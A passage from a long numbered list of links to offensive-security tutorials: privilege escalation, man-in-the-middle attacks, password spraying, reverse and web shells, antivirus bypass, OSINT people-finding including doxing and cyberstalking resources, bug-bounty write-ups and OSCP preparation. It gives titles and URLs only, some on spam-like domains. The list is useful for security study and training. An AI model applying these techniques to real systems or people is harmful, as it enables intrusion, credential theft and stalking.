https://chryzsh.gitbooks.io/pentestbook/privilege_escalation_-_linux.html -1668-Linux Privilege Escalation: https://percussiveelbow.github.io/linux-privesc/ -1669-Perform Local Privilege Escalation Using a Linux Kernel Exploit : https://null-byte.wonderhowto.com/how-to/perform-local-privilege-escalation-using-linux-kernel-exploit-0186317/ -1670-Linux Privilege Escalation With Kernel Exploit: https://www.yeahhub.com/linux-privilege-escalation-with-kernel-exploit-8572-c/ -1671-Reach the root! How to gain privileges in Linux: https://hackmag.com/security/reach-the-root/ -1672-Enumeration for Linux Privilege Escalation: https://0x00sec.org/t/enumeration-for-linux-privilege-escalation/1959 -1673-Linux Privilege Escalation Scripts : https://netsec.ws/?p=309 -1674-Understanding Privilege Escalation: www.admin-magazine.com/Articles/Understanding-Privilege-Escalation -1675-Toppo:1 | Vulnhub Walkthrough: https://medium.com/egghunter/toppo-1-vulnhub-walkthrough-c5f05358cf7d -1676-Privilege Escalation resources: https://forum.hackthebox.eu/discussion/1243/privilege-escalation-resources -1678-OSCP Notes – Privilege Escalation (Linux): https://securism.wordpress.com/oscp-notes-privilege-escalation-linux/ -1679-Udev Exploit Allows Local Privilege Escalation : www.madirish.net/370 -1680-Understanding Linux Privilege Escalation and Defending Against It: https://linux-audit.com/understanding-linux-privilege-escalation-and-defending-againt-it -1681-Windows Privilege Escalation Using PowerShell: https://hacknpentest.com/windows-privilege-escalation-using-powershell/ -1682-Privilege Escalation | Azeria Labs: https://azeria-labs.com/privilege-escalation/ -1683-Abusing SUDO (Linux Privilege Escalation): https://touhidshaikh.com/blog/?p=790 -1684-Privilege Escalation - Linux: https://mysecurityjournal.blogspot.com/p/privilege-escalation-linux.html -1685-0day Linux Escalation Privilege Exploit Collection : https://blog.spentera.id/0day-linux-escalation-privilege-exploit-collection/ -1686-Linux for Pentester: cp Privilege Escalation : https://hackin.co/articles/linux-for-pentester-cp-privilege-escalation.html -1687-Practical Privilege Escalation Using Meterpreter: https://ethicalhackingblog.com/practical-privilege-escalation-using-meterpreter/ -1688-dirty_sock: Linux Privilege Escalation (via snapd): https://www.redpacketsecurity.com/dirty_sock-linux-privilege-escalation-via-snapd/ -1689-Linux privilege escalation: https://jok3rsecurity.com/linux-privilege-escalation/ -1690-The Complete Meterpreter Guide | Privilege Escalation & Clearing Tracks: https://hsploit.com/the-complete-meterpreter-guide-privilege-escalation-clearing-tracks/ -1691-How to prepare for PWK/OSCP, a noob-friendly guide: https://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob -1692-Basic Linux privilege escalation by kernel exploits: https://greysec.net/showthread.php?tid=1355 -1693-Linux mount without root : epaymentamerica.com/tozkwje/xlvkawj2.php?trjsef=linux-mount-without-root -1694-Linux Privilege Escalation Oscp: www.condadorealty.com/2h442/linux-privilege-escalation-oscp.html -1695-Privilege Escalation Attack Tutorial: https://alhilalgroup.info/photography/privilege-escalation-attack-tutorial -1696-Oscp Bethany Privilege Escalation: https://ilustrado.com.br/i8v7/7ogf.php?veac=oscp-bethany-privilege-escalation -1697-Hacking a Website and Gaining Root Access using Dirty COW Exploit: https://ethicalhackers.club/hacking-website-gaining-root-access-using-dirtycow-exploit/ -1698-Privilege Escalation - Linux · Total OSCP Guide: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html -1699-Linux advanced privilege escalation: https://www.slideshare.net/JameelNabbo/linux-advanced-privilege-escalation -1700-Local Linux privilege escalation overview: https://myexperiments.io/linux-privilege-escalation.html -1701-Windows Privilege Escalation Scripts & Techniques : https://medium.com/@rahmatnurfauzi/windows-privilege-escalation-scripts-techniques-30fa37bd194 -1702-Penetration Testing: Maintaining Access: https://resources.infosecinstitute.com/penetration-testing-maintaining-access/ -1703-Kali Linux Maintaining Access : https://www.tutorialspoint.com/kali_linux/kali_linux_maintaining_access.htm -1704-Best Open Source Tools for Maintaining Access & Tunneling: https://n0where.net/maintaining-access -1705-Maintaining Access Part 1: Introduction and Metasploit Example: https://www.hackingloops.com/maintaining-access-metasploit/ -1706-Maintaining Access - Ethical hacking and penetration testing: https://miloserdov.org/?cat=143 -1707-Maintaining Access with Web Backdoors [Weevely]: https://www.yeahhub.com/maintaining-access-web-backdoors-weevely/ -1708-Best Open Source MITM Tools: Sniffing & Spoofing: https://n0where.net/mitm-tools -1709-Cain and Abel - Man in the Middle (MITM) Attack Tool Explained: https://cybersguards.com/cain-and-abel-man-in-the-middle-mitm-attack-tool-explained/ -1710-Man In The Middle Attack (MITM): https://medium.com/@nancyjohn.../man-in-the-middle-attack-mitm-114b53b2d987 -1711-Real-World Man-in-the-Middle (MITM) Attack : https://ieeexplore.ieee.org/document/8500082 -1712-The Ultimate Guide to Man in the Middle Attacks : https://doubleoctopus.com/blog/the-ultimate-guide-to-man-in-the-middle-mitm-attacks-and-how-to-prevent-them/ -1713-How to Conduct ARP Spoofing for MITM Attacks: https://tutorialedge.net/security/arp-spoofing-for-mitm-attack-tutorial/ -1714-How To Do A Man-in-the-Middle Attack Using ARP Spoofing & Poisoning: https://medium.com/secjuice/man-in-the-middle-attack-using-arp-spoofing-fa13af4f4633 -1715-Ettercap and middle-attacks tutorial : https://pentestmag.com/ettercap-tutorial-for-windows/ -1716-How To Setup A Man In The Middle Attack Using ARP Poisoning: https://online-it.nu/how-to-setup-a-man-in-the-middle-attack-using-arp-poisoning/ -1717-Intro to Wireshark and Man in the Middle Attacks: https://www.commonlounge.com/discussion/2627e25558924f3fbb6e03f8f912a12d -1718-MiTM Attack with Ettercap: https://www.hackers-arise.com/single-post/2017/08/28/MiTM-Attack-with-Ettercap -1719-Man in the Middle Attack with Websploit Framework: https://www.yeahhub.com/man-middle-attack-websploit-framework/ -1720-SSH MitM Downgrade : https://sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade -1721-How to use Netcat for Listening, Banner Grabbing and Transferring Files: https://www.yeahhub.com/use-netcat-listening-banner-grabbing-transferring-files/ -1722-Powershell port scanner and banner grabber: https://www.linkedin.com/pulse/powershell-port-scanner-banner-grabber-jeremy-martin/ -1723-What is banner grabbing attack: https://rxkjftu.ga/sport/what-is-banner-grabbing-attack.php -1724-Network penetration testing: https://guif.re/networkpentest -1725-NMAP Cheatsheet: https://redteamtutorials.com/2018/10/14/nmap-cheatsheet/ -1726-How To Scan a Network With Nmap: https://online-it.nu/how-to-scan-a-network-with-nmap/ -1727-Hacking Metasploitable : Scanning and Banner grabbing: https://hackercool.com/2015/11/hacking-metasploitable-scanning-banner-grabbing/ -1728-Penetration Testing of an FTP Server: https://shahmeeramir.com/penetration-testing-of-an-ftp-server-19afe538be4b -1729-Nmap Usage & Cheet-Sheet: https://aerroweb.wordpress.com/2018/03/14/namp-cheat-sheet/ -1730-Discovering SSH Host Keys with NMAP: https://mwhubbard.blogspot.com/2015/03/discovering-ssh-host-keys-with-nmap.html -1731-Banner Grabbing using Nmap & NetCat - Detailed Explanation: https://techincidents.com/banner-grabbing-using-nmap-netcat -1732-Nmap – (Vulnerability Discovery): https://crazybulletctfwriteups.wordpress.com/2015/09/5/nmap-vulnerability-discovery/ -1733-Penetration Testing on MYSQL (Port 3306): https://www.hackingarticles.in/penetration-testing-on-mysql-port-3306/ -1774-Password Spraying - Infosec Resources : https://resources.infosecinstitute.com/password-spraying/ -1775-Password Spraying- Common mistakes and how to avoid them: https://medium.com/@adam.toscher/password-spraying-common-mistakes-and-how-to-avoid-them-3fd16b1a352b -1776-Password Spraying Tutorial: https://attack.stealthbits.com/password-spraying-tutorial-defense -1777-password spraying Archives: https://www.blackhillsinfosec.com/tag/password-spraying/ -1778-The 21 Best Email Finding Tools:: https://beamery.com/blog/find-email-addresses -1779-OSINT Primer: People (Part 2): https://0xpatrik.com/osint-people/ -1780-Discovering Hidden Email Gateways with OSINT Techniques: https://blog.ironbastion.com.au/discovering-hidden-email-servers-with-osint-part-2/ -1781-Top 20 Data Reconnaissance and Intel Gathering Tools : https://securitytrails.com/blog/top-20-intel-tools -1782-101+ OSINT Resources for Investigators [2019]: https://i-sight.com/resources/101-osint-resources-for-investigators/ -1783-Digging Through Someones Past Using OSINT: https://nullsweep.com/digging-through-someones-past-using-osint/ -1784-Gathering Open Source Intelligence: https://posts.specterops.io/gathering-open-source-intelligence-bee58de48e05 -1785-How to Locate the Person Behind an Email Address: https://www.sourcecon.com/how-to-locate-the-person-behind-an-email-address/ -1786-Find hacked email addresses and check breach mails: https://www.securitynewspaper.com/2019/01/16/find-hacked-email-addresses/ -1787-A Pentester's Guide - Part 3 (OSINT, Breach Dumps, & Password : https://delta.navisec.io/osint-for-pentesters-part-3-password-spraying-methodology/ -1788-Top 10 OSINT Tools/Sources for Security Folks: www.snoopysecurity.github.io/osint/2018/08/02/10_OSINT_for_security_folks.html -1789-Top 5 Open Source OSINT Tools for a Penetration Tester: https://www.breachlock.com/top-5-open-source-osint-tools/ -1790-Open Source Intelligence tools for social media: my own list: https://www.andreafortuna.org/2017/03/20/open-source-intelligence-tools-for-social-media-my-own-list/ -1791-Red Teaming: I can see you! Insights from an InfoSec expert : https://www.perspectiverisk.com/i-can-see-you-osint/ -1792-OSINT Playbook for Recruiters: https://amazinghiring.com/osint-playbook/ -1793- Links for Doxing, Personal OSInt, Profiling, Footprinting, Cyberstalking: https://www.irongeek.com/i.php?page=security/doxing-footprinting-cyberstalking -1794-Open Source Intelligence Gathering 201 (Covering 12 additional techniques): https://blog.appsecco.com/open-source-intelligence-gathering-201-covering-12-additional-techniques-b76417b5a544?gi=2afe435c630a -1795-Online Investigative Tools for Social Media Discovery and Locating People: https://4thetruth.info/colorado-private-investigator-online-detective-social-media-and-online-people-search-online-search-tools.html -1796-Expanding Skype Forensics with OSINT: Email Accounts: http://www.automatingosint.com/blog/2016/05/expanding-skype-forensics-with-osint-email-accounts/ -1798-2019 OSINT Guide: https://www.randhome.io/blog/2019/01/05/2019-osint-guide/ -1799-OSINT - Passive Recon and Discovery of Assets: https://0x00sec.org/t/osint-passive-recon-and-discovery-of-assets/6715 -1800-OSINT With Datasploit: https://dzone.com/articles/osint-with-datasploit -1801-Building an OSINT Reconnaissance Tool from Scratch: https://medium.com/@SundownDEV/phone-number-scanning-osint-recon-tool-6ad8f0cac27b -1802-Find Identifying Information from a Phone Number Using OSINT Tools: https://null-byte.wonderhowto.com/how-to/find-identifying-information-from-phone-number-using-osint-tools-0195472/ -1803-Find Details Of any Mobile Number, Email ID, IP Address in the world (Step By Step): https://www.securitynewspaper.com/2019/05/02/find-details-of-any-mobile-number-email-id-ip-address-in-the-world-step-by-step/ -1804-Investigative tools for finding people online and keeping yourself safe: https://ijnet.org/en/story/investigative-tools-finding-people-online-and-keeping-yourself-safe -1805- Full text of "The Hacker Playbook 2 Practical Guide To Penetration Testing By Peter Kim": https://archive.org/stream/TheHackerPlaybook2PracticalGuideToPenetrationTestingByPeterKim/The%20Hacker%20Playbook%202%20-%20Practical%20Guide%20To%20Penetration%20Testing%20By%20Peter%20Kim_djvu.txt -1806-The Internet Archive offers over 15,000,000 freely downloadable books and texts. There is also a collection of 550,000 modern eBooks that may be borrowed by anyone with a free archive.org account: https://archive.org/details/texts?and%5B%5D=hacking&sin= -1807-Exploiting SSRF like a Boss — Escalation of an SSRF to Local File Read!: https://medium.com/@zain.sabahat/exploiting-ssrf-like-a-boss-c090dc63d326 -1808-How to Pass OSCP Like Boss: https://medium.com/@parthdeshani/how-to-pass-oscp-like-boss-b269f2ea99d -1809-Deploy a private Burp Collaborator Server in Azure: https://medium.com/bugbountywriteup/deploy-a-private-burp-collaborator-server-in-azure-f0d932ae1d70 -1810-Using Shodan Better Way! :): https://medium.com/bugbountywriteup/using-shodan-better-way-b40f330e45f6 -1811-How To Do Your Reconnaissance Properly Before Chasing A Bug Bounty: https://medium.com/bugbountywriteup/guide-to-basic-recon-bug-bounties-recon-728c5242a115 -1812-How we got LFI in apache Drill (Recon like a boss):: https://medium.com/bugbountywriteup/how-we-got-lfi-in-apache-drill-recon-like-a-boss-6f739a79d87d -1813-Chaining Self XSS with UI Redressing is Leading to Session Hijacking: https://medium.com/bugbountywriteup/chaining-self-xss-with-ui-redressing-is-leading-to-session-hijacking-pwn-users-like-a-boss-efb46249cd14 -1814-Week in OSINT #2019–19: https://medium.com/week-in-osint/week-in-osint-2019-18-1975fb8ea43a4 -1814-Week in OSINT #2019–02: https://medium.com/week-in-osint/week-in-osint-2019-02-d4009c27e85f -1815-Week in OSINT #2019–24: https://medium.com/week-in-osint/week-in-osint-2019-24-4fcd17ca908f -1816-Page Admin Disclosure | Facebook Bug Bounty 2019: https://medium.com/bugbountywriteup/page-admin-disclosure-facebook-bug-bounty-2019-ee9920e768eb -1817-XSS in Edmodo within 5 Minute (My First Bug Bounty): https://medium.com/@valakeyur/xss-in-edmodo-within-5-minute-my-first-bug-bounty-889e3da6167d -1818-Collection Of Bug Bounty Tip-Will Be updated daily: https://medium.com/@vignesh4303/collection-of-bug-bounty-tip-will-be-updated-daily-605911cfa248 -1819-A Unique XSS Scenario in SmartSheet || $1000 bounty.: https://medium.com/@rohanchavan/a-unique-xss-scenario-1000-bounty-347f8f92fcc6 -1820-How I found a simple bug in Facebook without any Test: https://medium.com/bugbountywriteup/how-i-found-a-simple-bug-in-facebook-without-any-test-3bc8cf5e2ca2 -1821-Facebook BugBounty — Disclosing page members: https://medium.com/@tnirmalz/facebook-bugbounty-disclosing-page-members-1178595cc520 -1822-Don’t underestimates the Errors They can provide good $$$ Bounty!: https://medium.com/@noob.assassin/dont-underestimates-the-errors-they-can-provide-good-bounty-d437ecca6596 -1823-Django and Web Security Headers: https://medium.com/@ksarthak4ever/django-and-web-security-headers-d72a9e54155e -1824-Weaponising Staged Cross-Site Scripting (XSS) Payloads: https://medium.com/redteam/weaponising-staged-cross-site-scripting-xss-payloads-7b917f605800 -1825-How I was able to Bypass XSS Protection on HackerOne’s Private Program: https://medium.com/@vulnerabilitylabs/how-i-was-able-to-bypass-xss-protection-on-hackerones-private-program-8914a31339a9 -1826-XSS in Microsoft subdomain: https://blog.usejournal.com/xss-in-microsoft-subdomain-81c4e46d6631 -1827-How Angular Protects Us From XSS Attacks?: https://medium.com/hackernoon/how-angular-protects-us-from-xss-attacks-3cb7a7d49d95 -1828-[FUN] Bypass XSS Detection WAF: https://medium.com/soulsecteam/fun-bypass-xss-detection-waf-cabd431e030e -1829-Bug Hunting Methodology(Part-2): https://blog.usejournal.com/bug-hunting-methodology-part-2-5579dac06150 -1830-Learn Web Application Penetration Testing: https://blog.usejournal.com/web-application-penetration-testing-9fbf7533b361 -1831-“Exploiting a Single Parameter”: https://medium.com/securitywall/exploiting-a-single-parameter-6f4ba2acf523 -1832-CORS To CSRF Attack: https://blog.usejournal.com/cors-to-csrf-attack-c33a595d441 -1833-Account Takeover Using CSRF(json-based): https://medium.com/@shub66452/account-takeover-using-csrf-json-based-a0e6efd1bffc -1834-Bypassing Anti-CSRF with Burp Suite Session Handling: https://bestestredteam.com/tag/anti-csrf/ -1835-10 Methods to Bypass Cross Site Request Forgery (CSRF): https://haiderm.com/10-methods-to-bypass-cross-site-request-forgery-csrf/ -1836-Exploiting CSRF on JSON endpoints with Flash and redirects: https://medium.com/p/681d4ad6b31b -1837-Finding and exploiting Cross-site request forgery (CSRF): https://securityonline.info/finding-exploiting-cross-site-request-forgery/ -1838-Hacking Facebook accounts using CSRF in Oculus-Facebook integration: https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf -1839-Synchronizer Token Pattern: No more tricks: https://medium.com/p/d2af836ccf71 -1840-The $12,000 Intersection between Clickjacking, XSS, and Denial of Service: https://medium.com/@imashishmathur/the-12-000-intersection-between-clickjacking-xss-and-denial-of-service-f8cdb3c5e6d1 -1841-XML External Entity(XXE): https://medium.com/@ghostlulzhacks/xml-external-entity-xxe-62bcd1555b7b -1842-XXE Attacks— Part 1: XML Basics: https://medium.com/@klose7/https-medium-com-klose7-xxe-attacks-part-1-xml-basics-6fa803da9f26 -1843-From XXE to RCE with PHP/expect — The Missing Link: https://medium.com/@airman604/from-xxe-to-rce-with-php-expect-the-missing-link-a18c265ea4c7 -1844-My first XML External Entity (XXE) attack with .gpx file: https://medium.com/@valeriyshevchenko/my-first-xml-external-entity-xxe-attack-with-gpx-file-5ca78da9ae98 -1845-Open Redirects & Security Done Right!: https://medium.com/@AkshaySharmaUS/open-redirects-security-done-right-e524a3185496 -1846-XXE on Windows system …then what ??: https://medium.com/@canavaroxum/xxe-on-windows-system-then-what-76d571d66745 -1847-Unauthenticated Blind SSRF in Oracle EBS CVE-2018-3167: https://medium.com/@x41x41x41/unauthenticated-ssrf-in-oracle-ebs-765bd789a145 -1848-SVG XLink SSRF fingerprinting libraries version: https://medium.com/@arbazhussain/svg-xlink-ssrf-fingerprinting-libraries-version-450ebecc2f3c -1849-What is XML Injection Attack: https://medium.com/@dahiya.aj12/what-is-xml-injection-attack-279691bd00b6 -1850-SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1: https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978 -1851-Penetration Testing Introduction: Scanning & Reconnaissance: https://medium.com/cyberdefenders/penetration-testing-introduction-scanning-reconnaissance-f865af0761f -1852-Beginner’s Guide to recon automation.: https://medium.com/bugbountywriteup/beginners-guide-to-recon-automation-f95b317c6dbb -1853-Red Teamer’s Guide to Pulse Secure SSL VPN: https://medium.com/bugbountywriteup/pulse-secure-ssl-vpn-post-auth-rce-to-ssh-shell-2b497d35c35b -1854-CVE-2019-15092 WordPress Plugin Import Export Users = 1.3.0 - CSV Injection: https://medium.com/bugbountywriteup/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection-b5cc14535787 -1855-How I harvested Facebook credentials via free wifi?: https://medium.com/bugbountywriteup/how-i-harvested-facebook-credentials-via-free-wifi-5da6bdcae049 -1856-How to hack any Payment Gateway?: https://medium.com/bugbountywriteup/how-to-hack-any-payment-gateway-1ae2f0c6cbe5 -1857-How I hacked into my neighbour’s WiFi and harvested login credentials?: https://medium.com/bugbountywriteup/how-i-hacked-into-my-neighbours-wifi-and-harvested-credentials-487fab106bfc -1858-What do Netcat, SMTP and self XSS have in common? Stored XSS: https://medium.com/bugbountywriteup/what-do-netcat-smtp-and-self-xss-have-in-common-stored-xss-a05648b72002 -1859-1-Click Account Takeover in Virgool.io — a Nice Case Study: https://medium.com/bugbountywriteup/1-click-account-takeover-in-virgool-io-a-nice-case-study-6bfc3cb98ef2 -1860-Digging into Android Applications — Part 1 — Drozer + Burp: https://medium.com/bugbountywriteup/digging-android-applications-part-1-drozer-burp-4fd4730d1cf2 -1861-Linux for Pentester: APT Privilege Escalation: https://www.hackingarticles.in/linux-for-pentester-apt-privilege-escalation -1862-Linux for Pentester : ZIP Privilege Escalation: https://www.hackingarticles.in/linux-for-pentester-zip-privilege-escalation -1863-Koadic - COM Command & Control Framework: https://www.hackingarticles.in/koadic-com-command-control-framework -1864-Configure Sqlmap for WEB-GUI in Kali Linux : https://www.hackingarticles.in/configure-sqlmap-for-web-gui-in-kali-linux -1865-Penetration Testing: https://www.hackingarticles.in/Penetration-Testing -1866-Buffer Overflow Examples, Code execution by shellcode : https://0xrick.github.io/binary-exploitation/bof5 -1867-Dynamic Shellcode Execution: https://www.countercept.com/blog/dynamic-shellcode-execution -1868-JSC Exploits: -https://googleprojectzero.blogspot.com/2019/08/jsc-exploits.html -1869-Injecting Into The Hunt: https://jsecurity101.com/2019/Injecting-Into-The-Hunt -1870-Bypassing Antivirus with Golang: https://labs.jumpsec.com/2019/06/20/bypassing-antivirus-with-golang-gopher.it -1871-Windows Process Injection: Print Spooler: https://modexp.wordpress.com/2019/03/07/process-injection-print-spooler -1872-Inject Shellcode Into Memory Using Unicorn : https://ethicalhackingguru.com/inject-shellcode-memory-using-unicorn -1873-Macros and More with SharpShooter v2.0: https://www.mdsec.co.uk/2019/02/macros-and-more-with-sharpshooter-v2-0 -1874-Fuzz Testing(Fuzzing) Tutorial: What is, Types, Tools & Example: https://www.guru99.com/fuzz-testing -1875-Introduction to File Format Fuzzing & Exploitation: https://medium.com/@DanielC7/introduction-to-file-format-fuzzing-exploitation-922143ab2ab3 -1876-Hacking a social media account and safeguarding it: https://medium.com/@ujasdhami79/hacking-a-social-media-account-and-safeguarding-it-e5f69adf62d7 -1877-OTP Bypass on India’s Biggest Video Sharing Site: https://medium.com/bugbountywriteup/otp-bypass-on-indias-biggest-video-sharing-site-e94587c1aa89 -1879-Getting Root on macOS via 3rd Party Backup Software: https://medium.com/tenable-techblog/getting-root-on-macos-via-3rd-party-backup-software-b804085f0c9 -1880-How to Enumerate MYSQL Database using Metasploit: https://ehacking.net/2020/03/how-to-enumerate-mysql-database-using-metasploit-kali-linux-tutorial.html -1881-Exploiting Insecure Firebase Database! https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty -1882-Penetration Testing - Complete Guide: https://softwaretestinghelp.com/penetration-testing-guide -1883-How To Upload A PHP Web Shell On WordPress Site: https://1337pwn.com/how-to-upload-php-web-shell-on-wordpress-site -1884-Mimikatz tutorial: How it hacks Windows passwords, credentials: https://searchsecurity.techtarget.com/tutorial/Mimikatz-tutorial-How-it-hacks-Windows-passwords-credentials -1885-Ethical hacking: Lateral movement techniques: https://securityboulevard.com/2019/09/ethical-hacking-lateral-movement-techniques -1886-A Pivot Cheatsheet for Pentesters: http://nullsweep.com/pivot-cheatsheet-for-pentesters -1887-What to Look for When Reverse Engineering Android Apps: http://nowsecure.com/blog/2020/02/26/what-to-look-for-when-reverse-engineering-android-apps -1888-Modlishka: Advance Phishing to Bypass 2 Factor Auth: http://crackitdown.com/2019/02/modlishka-kali-linux.html -1889-Bettercap Usage Examples (Overview, Custom setup, Caplets ): www.cyberpunk.rs/bettercap-usage-examples-overview-custom-setup-caplets -1890-The Complete Hashcat Tutorial: https://ethicalhackingguru.com/the-complete-hashcat-tutorial -1891-Wireless Wifi Penetration Testing Hacker Notes: https://executeatwill.com/2020/01/05/Wireless-Wifi-Penetration-Testing-Hacker-Notes -1892-#BugBounty writeups: https://pentester.land/list-of-bug-bounty-writeups.html -1893-Kerberoasting attack: https://en.hackndo.com/kerberoasting -1894-A Pentester's Guide - Part 2 (OSINT - LinkedIn is not just for jobs): https://delta.navisec.io/osint-for-pentesters-part-2-linkedin-is-not-just-for-jobs -1895-Radare2 cutter tutorial: http://cousbox.com/axflw/radare2-cutter-tutorial.html -1896-Cracking Password Hashes with Hashcat: http://hackingvision.com/2020/03/22/cracking-password-hashes-hashcat -1897-From CSRF to RCE and WordPress-site takeover CVE-2020-8417: http://blog.wpsec.com/csrf-to-rce-wordpress -1898-Best OSINT Tools: http://pcwdld.com/osint-tools-and-software -1899-Metasploit Exploitation Tool 2020: http://cybervie.com/blog/metasploit-exploitation-tool -1900-How to exploit CVE-2020-7961: https://synacktiv.com/posts/pentest/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html -1901-PowerShell for Pentesters: https://varonis.com/blog/powershell-for-pentesters -1902-Android Pentest Tutorial: https://packetstormsecurity.com/files/156432/Android-Pentest-Tutorial-Step-By-Step.html -1903-Burp Suite Tutorial: https://pentestgeek.com/web-applications/burp-suite-tutorial-1 -1904-Company Email Enumeration + Breached Email Finder: https://metalkey.github.io/company-email-enumeration--breached-email-finder.html -1905-Kali Linux Cheat Sheet for Penetration Testers: https://github.com/NoorQureshi/kali-linux-cheatsheet -1906-Active Directory Exploitation Cheat Sheet: A cheat sheet that contains common enumeration and attack methods for Windows Active Directory. https://github.com/buftas/Active-Directory-Exploitation-Cheat-Sheet#using-bloodhound -1907-Advanced Hacking Tutorials Collection: https://yeahhub.com/advanced-hacking-tutorials-collection -1908-Persistence – DLL Hijacking: https://pentestlab.blog/2020/03/04/persistence-dll-hijacking -1909-Brute force and dictionary attacks: A cheat sheet: https://techrepublic.com/article/brute-force-and-dictionary-attacks-a-cheat-sheet -1910-How to use Facebook for Open Source Investigation: https://securitynewspaper.com/2020/03/11/how-to-use-facebook-for-open-source-investigation-osint -1911-tcpdump Cheat Sheet: https://comparitech.com/net-admin/tcpdump-cheat-sheet -1912-Windows Post exploitation recon with Metasploit: https://hackercool.com/2016/10/windows-post-exploitation-recon-with-metasploit -1913-Bug Hunting Methodology: https://blog.usejournal.com/bug-hunting-methodology-part-1-91295b2d2066 -1914-Malware traffic analysis tutorial: https://apuntpsicolegs.com/veke0/malware-traffic-analysis-tutorial.html -1915-Recon-ng v5 Tutorial: https://geekwire.eu/recon-ng-v5-tutorial -1916-Windows and Linux Privilege Escalation Tools: https://yeahhub.com/windows-linux-privilege-escalation-tools-2019 -1917-Total OSCP Guide: https://sushant747.gitbooks.io/total-oscp-guide -1918-Phishing Windows Credentials: https://pentestlab.blog/2020/03/02/phishing-windows-credentials -1919-Getting What You're Entitled To: A Journey Into MacOS Stored Credentials: https://mdsec.co.uk/2020/02/getting-what-youre-entitled-to-a-journey-in-to-macos-stored-credentials -1920-Recent Papers Related To Fuzzing: https://wcventure.github.io/FuzzingPaper -1921-Web Shells 101 Using PHP (Web Shells Part 2): https://acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/ -1922-Python3 reverse shell: https://polisediltrading.it/hai6jzbs/python3-reverse-shell.html -1923-Reverse Shell between two Linux machines: https://yeahhub.com/reverse-shell-linux-machines -1924-Tutorial - Writing Hardcoded Windows Shellcodes (32bit): https://dsolstad.com/shellcode/2020/02/02/Tutorial-Hardcoded-Writing-Hardcoded-Windows-Shellcodes-32bit.html -1925-How to Use Wireshark: Comprehensive Tutorial + Tips: https://varonis.com/blog/how-to-use-wireshark -1926-How To Use PowerShell for Privilege Escalation with Local Privilege Escalation? https://varonis.com/blog/how-to-use-powershell-for-privilege-escalation-with-local-computer-accounts -1927-Ethical hacking:Top privilege escalation techniques in Windows: https://securityboulevard.com/2020/03/ethical-hacking-top-privilege-escalation-techniques-in-windows -1928-How to Identify Company's Hacked Email Addresses: https://ehacking.net/2020/04/how-to-identify-companys-hacked-email-addresses-using-maltego-osint-haveibeenpawned.html -1929-Android APK Reverse Engineering: What's in an APK: https://secplicity.org/2019/09/11/android-apk-reverse-engineering-whats-in-an-apk -1930-Keep Calm and HackTheBox - Beep: https://freecodecamp.org/news/keep-calm-and-hack-the-box-beep/ -1931-Keep Calm and HackTheBox -Legacy: https://freecodecamp.org/news/keep-calm-and-hack-the-box-legacy/ -1932-Keep Calm and HackTheBox -Lame: https://freecodecamp.org/news/keep-calm-and-hack-the-box-lame/ -1933-HacktheBox:Writeup Walkthrough: https://hackingarticles.in/hack-the-box-writeup-walkthrough -1934-2020 OSCP Exam Preparation: https://cybersecurity.att.com/blogs/security-essentials/how-to-prepare-to-take-the-oscp -1935-My OSCP transformation: https://kevsec.fr/journey-to-oscp-2019-write-up -1936-A Detailed Guide on OSCP Preparation: https://niiconsulting.com/checkmate/2017/06/a-detail-guide-on-oscp-preparation-from-newbie-to-oscp/ -1937-Useful Commands and Tools - #OSCP: https://yeahhub.com/useful-commands-tools-oscp/ -1938-Comprehensive Guide on Password Spraying Attack https://hackingarticles.in/comprehensive-guide-on-password-spraying-attack -1939-Privilege Escalation: https://pentestlab.blog/category/privilege-escalation/ -1940-Red Team: https://pentestlab.blog/category/red-team/ -1941-Linux post-exploitation.Advancing from user to super-user in a few clicks https://hackmag.com/security/linux-killchain/ -1942--#BugBounty Cheatsheet https://m0chan.github.io/2019/12/17/Bug-Bounty-Cheetsheet.html -1943--#Windows Notes/Cheatsheet https://m0chan.github.io/2019/07/30/Windows-Notes-and-Cheatsheet.html -1944-#Linux Notes/Cheatsheet https://m0chan.github.io/2018/07/31/Linux-Notes-And-Cheatsheet.html -1945-Windows Notes https://mad-coding.cn/tags/Windows/ -1946-#BlueTeam CheatSheet https://gist.github.com/SwitHak/62fa7f8df378cae3a459670e3a18742d -1947-Linux Privilege Escalation Cheatsheet for OSCP: https://hackingdream.net/2020/03/linux-privilege-escalation-cheatsheet-for-oscp.html -1948-Shodan Pentesting Guide: https://community.turgensec.com/shodan-pentesting-guide -1949-Pentesters Guide to PostgreSQL Hacking: https://medium.com/@netscylla/pentesters-guide-to-postgresql-hacking-59895f4f007 -1950-Hacking-OSCP cheatsheet: https://ceso.github.io/posts/2020/04/hacking/oscp-cheatsheet/ -1951-A Comprehensive Guide to Breaking SSH: https://community.turgensec.com/ssh-hacking-guide -1952-Windows Privilege Escalation Methods for Pentesters: https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ -1953-Best #firefox addons for #Hacking: https://twitter.com/cry__pto/status/1210836734331752449 -1954-S3 Bucket Enumeration Tools: https://twitter.com/cry__pto/status/1269862357645307904 -1955-Github Recon Tools: https://twitter.com/cry__pto/status/1269362041044832257 -1956-i created this group for more in depth sharing about hacking and penetration testing /daily posts: you can join: https://facebook.com/groups/AmmarAmerHacker -1957-Directory Bruteforcing Tools: && SCREENSHOTTING Tools: https://twitter.com/cry__pto/status/1270603017256124416 -1958-S3 Bucket Enumeration Tools: https://twitter.com/cry__pto/status/1269862357645307904 -1959-Github Recon Tools: https://twitter.com/cry__pto/status/1269362041044832257 -1960-Website Mirroring Tools: https://twitter.com/cry__pto/status/1248640849812078593 -1961-automated credential discovery tools: https://twitter.com/cry__pto/status/1253214720372465665 -1962-Antiforensics Techniques: https://twitter.com/cry__pto/status/1215001674760294400 -1963-#bugbounty tools part (1): https://twitter.com/cry__pto/status/1212096231301881857 1964-Binary Analysis Frameworks: https://twitter.com/cry__pto/status/1207966421575184384 -1965-#BugBounty tools part (5): https://twitter.com/cry__pto/status/1214850754055458819 -1966-#BugBounty tools part (3): https://twitter.com/cry__pto/status/1212290510922158080 -1967-Kali Linux Commands List (Cheat 